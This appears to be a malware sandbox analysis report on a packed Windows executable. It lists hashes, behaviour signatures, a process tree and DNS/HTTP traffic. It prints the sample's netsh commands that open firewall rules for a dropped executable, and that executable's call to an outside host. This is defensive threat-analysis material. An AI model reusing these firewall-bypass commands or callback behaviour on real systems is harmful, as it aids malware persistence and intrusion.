Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

7

8fa98d104b...3c.exe

windows7-x64

8

8fa98d104b...3c.exe

windows10-2004-x64

8

$PLUGINSDI...el.dll

windows7-x64

7

$PLUGINSDI...el.dll

windows10-2004-x64

7

$PLUGINSDI...ec.dll

windows7-x64

3

$PLUGINSDI...ec.dll

windows10-2004-x64

3

$_70_/Basi...r1.exe

windows7-x64

3

$_70_/Basi...r1.exe

windows10-2004-x64

3

$_70_/dotN...up.exe

windows7-x64

7

$_70_/dotN...up.exe

windows10-2004-x64

7

$_70_/hapjyaj.exe

windows7-x64

3

$_70_/hapjyaj.exe

windows10-2004-x64

3

Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27/01/2025, 04:25 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe

  • Size

    983KB

  • MD5

    e869ad846639738812a1cb901f801120

  • SHA1

    730e00adff312d1232ea7279926b4018cf0d853b

  • SHA256

    8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c

  • SHA512

    d8bd53d5e82a3bdcdb0cb0fa5e928e476be87450ad0e4bb03046f5231f5d4f45b2457820cb918122daabf3f9d3737c2e70ed71c74dea85fdbc70ddc2d8732b08

  • SSDEEP

    24576:9GiQdsdzTxXMQCMDtUrbtoKXhn7Hu+tjqUx+kchEvoU:87gxcrNbuK0+tWOchE3

Score
8/10
defense_evasiondiscoverypersistenceprivilege_escalationupx

Malware Config

Signatures

  • Modifies Windows Firewall 2 TTPs 2 IoCs
    defense_evasion
  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe
    "C:\Users\Admin\AppData\Local\Temp\8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2320
    • C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name=hapjyaj dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\hapjyaj.exe" enable=yes profile=public,private
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      • System Location Discovery: System Language Discovery
      PID:1932
    • C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name=hapjyaj dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\hapjyaj.exe" enable=yes profile=public,private
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      • System Location Discovery: System Language Discovery
      PID:2700
    • C:\Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\hapjyaj.exe
      "C:\Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\hapjyaj.exe" "http://www.marvburris.click" "C:\Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\8197"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1492
    • C:\Windows\SysWOW64\explorer.exe
      C:\Windows\system32\explorer.exe
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      PID:2888

Network

  • flag-us
    DNS
    www.marvburris.click
    hapjyaj.exe
    Remote address:
    8.8.8.8:53
    Request
    www.marvburris.click
    IN A
    Response
    www.marvburris.click
    IN CNAME
    ppp84k45ss7ehy8ypic5x.limelightcdn.com
    ppp84k45ss7ehy8ypic5x.limelightcdn.com
    IN A
    23.106.59.18
  • flag-gb
    GET
    http://www.marvburris.click/
    hapjyaj.exe
    Remote address:
    23.106.59.18:80
    Request
    GET / HTTP/1.1
    Host: www.marvburris.click
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 27 Jan 2025 04:25:58 GMT
    Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
    X-Powered-By: PHP/5.3.13
    Content-Length: 2
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html
  • 23.106.59.18:80
    http://www.marvburris.click/
    http
    hapjyaj.exe
    254 B
     388 B
     4
    3

    HTTP Request

    GET http://www.marvburris.click/

    HTTP Response

    200
  • 8.8.8.8:53
    www.marvburris.click
    dns
    hapjyaj.exe
    66 B
     134 B
     1
    1

    DNS Request

    www.marvburris.click

    DNS Response

    23.106.59.18

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\hapjyaj.exe.config
    Filesize

    257B

    MD5

    441f5c5c7933c16068a03d99bc8837c4

    SHA1

    76d1de63216c2c1218cf47a5d768a18952a1dcb3

    SHA256

    f1cac503709c2acd9ab0a7d0e48a4abf2777d16052fee68830260a78359ec72f

    SHA512

    5b8fa02b827993541841a2fd07a50e5d2c5a7f5ba35e0b282ed3a453e3f919d63f1c9432d922cc364027351c57d2b78f99f5f1469c86b581cc53acb76fdfc366

    Download Submit

  • \Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\SelfDel.dll
    Filesize

    5KB

    MD5

    e5786e8703d651bc8bd4bfecf46d3844

    SHA1

    fee5aa4b325deecbf69ccb6eadd89bd5ae59723f

    SHA256

    d115bce0a787b4f895e700efe943695c8f1087782807d91d831f6015b0f98774

    SHA512

    d14ad43a01db19428cd8ccd2fe101750860933409b5be2eb85a3e400efcd37b1b6425ce84e87a7fe46ecabc7b91c4b450259e624c178b86e194ba7da97957ba3

    Download Submit

  • \Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\hapjyaj.exe
    Filesize

    10KB

    MD5

    9916cd804c030ab91eabab4c3d1f39f6

    SHA1

    d01995ac1f61a17211b0c942d38504e35ac89c1a

    SHA256

    6920bf36c100c838c5fcc48b3665f660e0c158449ed1a42f64cb1c054cf90eef

    SHA512

    db60ef4e82328841153114c002c7d7664c5f7b7e5a916ea106912a0fe5a9f86a4ffc0a8f062f3cc974982efbc9b0ee7ff56582efe77e34dca001fc8b79d8ccc4

    Download Submit

  • \Users\Admin\AppData\Local\Temp\nsjC8DC.tmp\nsExec.dll
    Filesize

    7KB

    MD5

    11092c1d3fbb449a60695c44f9f3d183

    SHA1

    b89d614755f2e943df4d510d87a7fc1a3bcf5a33

    SHA256

    2cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77

    SHA512

    c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a

    Download Submit

  • memory/1492-40-0x0000000000E60000-0x0000000000E68000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2320-22-0x0000000074AD0000-0x0000000074AD9000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2888-38-0x0000000000050000-0x0000000000090000-memory.dmp

    Filesize

    256KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.